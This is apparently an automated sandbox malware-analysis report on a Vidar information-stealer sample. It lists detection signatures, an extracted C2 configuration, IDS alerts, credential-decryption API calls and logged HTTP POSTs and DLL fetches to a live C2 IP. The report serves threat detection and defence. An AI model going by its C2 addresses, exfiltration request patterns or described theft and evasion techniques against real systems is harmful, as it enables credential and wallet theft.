Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524661
MD5: 37ec6ac7a655216941a30dc46fe1b189
SHA1: cf6637aabee2fd26a76e30db0a289201305372fb
SHA256: 677862ec62130345467fc6472bfbeff124fd2716897db3f8549c29f016ef13cd
Tags: exe user-Bitsight
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 2960 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 37EC6AC7A655216941A30DC46FE1B189)
    • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 5576 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "bb7310eab4245006f125c442da2d1e50"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.6e820000.6.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.6e820000.6.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
0.2.file.exe.6e820000.6.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.6e820000.6.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
3.2.aspnet_regiis.exe.400000.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T03:35:53.721399+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49722 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:54.941629+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49723 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:56.366413+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49724 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:57.730654+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49725 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:59.102733+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49726 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:00.559955+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49727 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:01.905602+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49728 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:04.977333+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49729 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:06.117394+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49730 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:07.390575+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49731 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:08.845534+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49732 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:10.824936+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49733 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:12.845715+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49735 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:14.763414+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49736 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:16.183576+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49737 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:17.668662+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49738 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:20.838688+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49739 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:22.146206+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49740 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:23.489607+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49741 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:25.031403+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49743 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:27.088335+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49744 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:28.988557+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49745 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:58.429229+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 49.12.197.9 | 443 | 192.168.2.6 | 49725 | TCP
2024-10-03T03:35:59.801644+0200 | 2051831 | 1 | Malware Command and Control Activity Detected | 49.12.197.9 | 443 | 192.168.2.6 | 49726 | TCP
2024-10-03T03:35:58.429123+0200 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.6 | 49725 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:30.410110+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49746 | 147.45.44.104 | 80 | TCP

                          AV Detection

                          Source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "bb7310eab4245006f125c442da2d1e50"}
                          Source: https://49.12.197.9/NVirustotal: Detection: 9%
                          Source: https://49.12.197.9/Virustotal: Detection: 10%
                          Source: https://49.12.197.9/sqlp.dllVirustotal: Detection: 11%
                          Source: https://49.12.197.9Virustotal: Detection: 10%
                          Source: file.exeReversingLabs: Detection: 21%
                          Source: file.exeVirustotal: Detection: 30%
                          Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\AppData\Roaming\msvcp110.dllJoe Sandbox ML: detected
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,3_2_004080A1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00408048
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00411E5D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,3_2_0040A7D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C7A6C80
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49721 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49729 version: TLS 1.2
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                          Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.3394302971.000000003A330000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.3389107122.000000002E456000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                          Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E8120ED FindFirstFileExW,0_2_6E8120ED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_004014AD

                          Networking

                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49725 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.6:49725
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.6:49726
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 49.12.197.9 49.12.197.9
                          Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                          Source: Joe Sandbox ViewIP Address: 147.45.44.104 147.45.44.104
                          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                          Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49725 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49723 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49727 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49726 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49722 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49728 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49724 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49729 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49732 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49733 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49731 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49730 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49735 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49736 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49737 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49738 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49741 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49745 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49743 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49739 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49744 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49740 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49746 -> 147.45.44.104:80
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBAKKJKKECGDGCAECAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6069Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFI | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Connection: Keep-Alive | Cache-Control: no-cache
